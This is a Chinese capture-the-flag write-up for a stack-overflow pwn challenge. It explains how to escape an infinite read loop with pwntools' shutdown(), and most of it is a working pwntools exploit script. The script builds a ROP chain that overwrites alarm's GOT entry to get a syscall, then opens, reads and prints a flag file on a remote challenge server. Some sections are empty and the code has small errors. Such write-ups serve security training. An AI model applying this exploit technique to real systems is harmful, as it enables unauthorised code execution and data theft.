1.题目
1.1.保护机制
开启nx
1.2.关键代码
2.思路
重点1:看出来是个很简单的栈溢出,但是第一个问题是这个循环是个死循环,如果直接使用close()函数程序会直接退出,查询资料后发现pwn库中提供了shutdown()函数,他可以关闭IO流,即让循环正常退出
重点3:然后使用open系统调用打开文件流,再用read函数读取(fd是3,0,1,2已经分别被标准输入、标准输出、标准错误所占用),然后使用printf输出
from pwn import *
from ctypes import *
context(arch="amd",os="linux",log_level="debug")
con = remote('111.200.241.244',50865)
elf = ELF('./pwn')
pop_rdi = 0x4008a3
pop_rsi_r15 = 0x4008a1
pop_rdx = 0x4006fe
pop_rax = 0x4006fc
add_prdi_al = 0x40070d
offset = 0x5
alarm_got = elf.got['alarm']
alarm_plt = elf.plt['alarm']
printf_addr = elf.plt['printf']
read_addr = elf.plt['read']
flag_addr = 0x601058
n_sys_open = 0x2
O_RDONLY = 0x0
bss_addr = 0x601070
fd = 0x3
payload = "A"*56
payload += p(pop_rax)+p(offset)+p(pop_rdi)+p(alarm_got)+p(add_prdi_al)
payload += p(pop_rax)+p(0x2)+p(pop_rdi)+p(flag_addr)+p(pop_rsi_r15)+p(O_RDONLY)+p(0x0)+p(alarm_plt)
payload += p(pop_rdi)+p(fd)+p(pop_rsi_r15)+p(bss_addr)+p(0x0)+p(pop_rdx)+p(0x50)+p(read_addr)
payload += p(pop_rdi)+p(bss_addr)+p(printf_addr)
payload = payload.ljust(0x200,"A")
con.sendlineafter("server!\n",str(0x200))
con.send(payload)
con.recv()
con.shutdown()
con.interactive()
